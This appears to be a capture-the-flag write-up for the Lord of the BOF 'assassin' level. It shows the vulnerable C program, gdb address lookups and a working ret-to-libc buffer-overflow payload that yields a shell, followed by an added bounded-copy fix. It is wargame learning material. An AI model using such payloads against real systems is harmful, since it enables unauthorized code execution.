[lob] giant -> assassin
    Study/LOB 2014. 7. 30. 20:07

    [giant@localhost giant]$ ls
    assassin  assassin.c
    [giant@localhost giant]$ cat assassin.c
    /*
            The Lord of the BOF : The Fellowship of the BOF
            - assassin
            - no stack, no RTL
    */

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>   /* strcpy, memset */

    int main(int argc, char *argv[])
    {
        char buffer[40];

        if(argc < 2){
            printf("argv error\n");
            exit(0);
        }

        /* reject a return address pointing into the stack (0xbfxxxxxx) */
        if(argv[1][47] == '\xbf')
        {
            printf("stack retbayed you!\n");
            exit(0);
        }

        /* reject a return address pointing into libc (0x40xxxxxx) */
        if(argv[1][47] == '\x40')
        {
            printf("library retbayed you, too!!\n");
            exit(0);
        }

        /* unbounded copy into the 40-byte buffer */
        strcpy(buffer, argv[1]);
        printf("%s\n", buffer);

        // buffer+sfp hunter
        memset(buffer, 0, 44);
        return 0;
    }
    [giant@localhost giant]$

    Breakpoint 1, 0x804839b in main ()
    (gdb) p system
    $1 = {<text variable, no debug info>} 0x40058ae0 <__libc_system>
    (gdb)

    [giant@localhost giant]$ ./find
    /bin/sh : 0x400fbff9

    payload = 44-byte dummy + address of a ret instruction in memory (0804851E) + address of the system function + return address (BBBB) + address of /bin/sh

    [giant@localhost giant]$ ./assassin `python -c'print "A"*44+"\x1e\x85\x04\x08"+"\xe0\x8a\x05\x40"+"BBBB"+"\xf9\xbf\x0f\x40"'`
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA??@BBBB廈@
    bash$ Xshell
    bash$ my-pass
    euid = 515
    pushing me away
    bash$
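    As an added illustration that is not part of the original post, here is a bounded replacement for the unchecked strcpy() in assassin.c: the copy is limited to the 40-byte buffer and oversized input is rejected outright, instead of inspecting a single byte at argv[1][47]. The function name copy_arg and its return codes are my own choice.

```c
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 40   /* same size as `buffer` in assassin.c */

/*
 * Bounded replacement for `strcpy(buffer, argv[1])` in assassin.c.
 * Copies arg into buf only if it fits together with its NUL terminator;
 * it never writes past bufsize bytes, so the saved frame pointer and
 * return address behind the buffer cannot be overwritten.
 * Returns the number of bytes copied (without the NUL), or -1 if the
 * argument is too long or a pointer is NULL; buf is then emptied.
 */
int copy_arg(char *buf, size_t bufsize, const char *arg)
{
    size_t len = 0;
    if (buf == NULL || bufsize == 0 || arg == NULL)
        return -1;

    /* Scan at most bufsize bytes: enough to decide whether it fits. */
    while (len < bufsize && arg[len] != '\0')
        len++;

    if (len >= bufsize) {       /* no room left for the NUL terminator */
        buf[0] = '\0';
        return -1;
    }

    memcpy(buf, arg, len + 1);  /* copy the terminator as well */
    return (int)len;
}

int main(int argc, char *argv[])
{
    char buffer[BUF_SIZE];

    if (argc < 2) {
        printf("argv error\n");
        return 1;
    }

    if (copy_arg(buffer, sizeof buffer, argv[1]) < 0) {
        printf("argument too long (max %d bytes)\n", BUF_SIZE - 1);
        return 1;
    }

    printf("%s\n", buffer);
    return 0;
}
```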

